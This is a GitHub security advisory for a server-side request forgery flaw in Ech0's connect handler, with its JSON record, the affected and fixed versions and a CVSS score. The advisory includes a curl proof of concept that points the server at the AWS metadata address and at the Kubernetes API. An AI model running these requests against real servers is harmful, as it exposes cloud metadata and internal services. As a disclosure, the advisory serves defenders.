GHSA-8MC6-XJPR-H98X
Vulnerability from github – Published: 2026-05-07 21:28 – Updated: 2026-05-07 21:28
VLAI?
Summary
Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo
Details
Summary
The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest (which has ValidatePublicHTTPURL with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints.
Details
In internal/service/connect/connect.go, the fetchPeerConnectInfo function:
func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)
This uses SendRequest which has NO URL validation. The codebase HAS SendSafeRequest at internal/util/http/http.go:228-281 with proper SSRF protection, but fetchPeerConnectInfo does not use it.
Called from:
- Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)
- - Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)
PoC
# 1. Add a connection pointing to AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" \
-H "Authorization: Bearer <token>" \
-d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}'
# 2. Trigger SSRF via health check
curl -H "Authorization: Bearer <token>" \
"https://ech0.example.com/api/connects/health"
# Returns AWS EC2 instance ID
Or for Kubernetes:
curl -X POST "https://ech0.example.com/api/connects" \
-H "Authorization: Bearer <token>" \
-d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}'
Impact
- Confidentiality: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API
-
- CWE-918: Server-Side Request Forgery
Severity ?
7.7 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lin-snow/ech0"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.8-0.20260503040602-091d26d2d942"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T21:28:40Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\nThe `fetchPeerConnectInfo` function in `internal/service/connect/connect.go:214-239` uses `httpUtil.SendRequest` (no SSRF protection) instead of `SendSafeRequest` (which has `ValidatePublicHTTPURL` with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints.\n\n## Details\nIn `internal/service/connect/connect.go`, the `fetchPeerConnectInfo` function:\n```go\nfunc fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {\n url := httpUtil.TrimURL(peerConnectURL) + \"/api/connect\"\n resp, err := httpUtil.SendRequest(url, \"GET\", struct {...}{...}, requestTimeout)\n```\n\nThis uses `SendRequest` which has NO URL validation. The codebase HAS `SendSafeRequest` at `internal/util/http/http.go:228-281` with proper SSRF protection, but `fetchPeerConnectInfo` does not use it.\n\nCalled from:\n- Line 307: `data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)`\n- - Line 498: `data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)`\n## PoC\n```bash\n# 1. Add a connection pointing to AWS metadata service\ncurl -X POST \"https://ech0.example.com/api/connects\" \\\n -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n -d \u0027{\"connect_url\": \"http://169.254.169.254/latest/meta-data/instance-id\"}\u0027\n\n# 2. Trigger SSRF via health check\ncurl -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n \"https://ech0.example.com/api/connects/health\"\n# Returns AWS EC2 instance ID\n```\n\nOr for Kubernetes:\n```bash\ncurl -X POST \"https://ech0.example.com/api/connects\" \\\n -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n -d \u0027{\"connect_url\": \"http://kubernetes.default.svc.cluster.local:443/api\"}\u0027\n```\n\n## Impact\n- **Confidentiality**: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API\n- - **CWE-918**: Server-Side Request Forgery",
"id": "GHSA-8mc6-xjpr-h98x",
"modified": "2026-05-07T21:28:40Z",
"published": "2026-05-07T21:28:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-8mc6-xjpr-h98x"
},
{
"type": "WEB",
"url": "https://github.com/lin-snow/Ech0/commit/091d26d2d942df6df9f520328d2f9cf2592bbefc"
},
{
"type": "PACKAGE",
"url": "https://github.com/lin-snow/Ech0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…